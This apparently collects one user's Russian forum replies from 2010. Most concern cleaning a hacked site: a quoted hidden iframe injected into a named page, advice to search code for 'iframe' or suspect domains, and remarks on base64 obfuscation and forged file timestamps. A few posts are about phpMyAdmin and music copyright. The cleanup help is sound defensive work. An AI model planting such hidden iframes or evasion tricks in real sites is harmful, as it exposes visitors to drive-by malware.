Спасибо большое, результат - прямо в точку!
заранее спасибо, отправляю в личку
панацеи нет ни на что... :( echo "ht"+"tp"; или echo "h"+"t"+"t"+"p";
мы рассматриваем конкретный случай, а не переливаем воду.
ява-скрипт выполняется на стороне клиента(т.е. браузера) и он не имеет ни какого отношения к вредоносному коду,
который я показал в первом своем посте.
этот html код отдает именно сервер(пхп,перл,цги и т.д.), а не клиентский ява скрипт.
admak добавил 16.10.2010 в 16:20
wiki\js.php - это уже следствие включенного ранее ифрейма.
когда-то наблюдал картину, что через первый ифрейм цеплялось еще последовательно штук 7 других вирусяк. наверное, они надеялись, что если первый вирус не сработает, то сработает второй, третий и т.д.
изменить дату/время файла - всего лишь одна команда.
1. Искать подгружаемые файлы (include, require и т.д.)
ну это понятно. возможен еще вариант, когда все свои скрипты действительно абсолютно чистые, а вот хостинг - не совсем. это редкий случай, но встречался и с таким тоже
2. Искать в коде по "http"
лучше искать co.cc или iframe или куски доменов, что приведены выше.
хотя... простейший самописный кодировщик скроет все это, не говоря про тривиальный base64, uuencode и прочее..
3. Искать все java-скрипты
ява-скрипты тут не при чем, т.к. в данном случае контент отдается пхп скриптом.
мы видим только, то что скрипт отдает браузеру, а вот сам пхп скрипт и условий по которым вредоносный код может появиться мы не видим. достаточно одного какого-то затрояненного плагина к цмс-ке, чтобы испортить жизнь сайта надолго.
а это что за бип-ня?...
на странице http://m350.ru/price/
<div class="navigation2"><iframe src=";onpage=cleaner&e=http" style="display:none"></iframe>
чистить немедленно. такого признака может быть достаточно для занесения в блек.
Upd: похоже вас довольно умно затроянили, при рефреше код пропадает.
если нужно, помогу найти и вычистить этот код с сайта.
авторские права...
а сама музыка - это самые обычные файлы, так что ничего особого нет.
обычно, что бы сориентироваться или по-быстрому отобрать записи, делается
select * from table (добавлю еще одинаковый limit или where для чистоты эксперимента)
я довольно часто в базах использую поля типа text или mediumtext и в одной записи их может быть несколько и они заполнены.
десктопный клиент честно полностью вытягивает N записей и отображает их в листинге, в то время как phpMyAdmin через веб интерфейс отдает только несколько первых символов от каждого текстового поля (для беглого просмотра мне этого достаточно).
вот и получается разница в передаваемом объеме информации в несколько раз, отсюда и подтормаживание.
можно и так и сяк :)
phpMyAdmin - неприхотлив.
если сомневаетесь в своих силах, то потренируйтесь в другой папке. как все получится - можете переписывать поверх. хотя подводных камней по идее возникнуть в любом случае не должно.
да, совершенно верно.
admak добавил 15.10.2010 в 22:35
десктопные клиенты - хороши, удобны, сам пользуюсь, но они жутко тормозят на больших табличках.
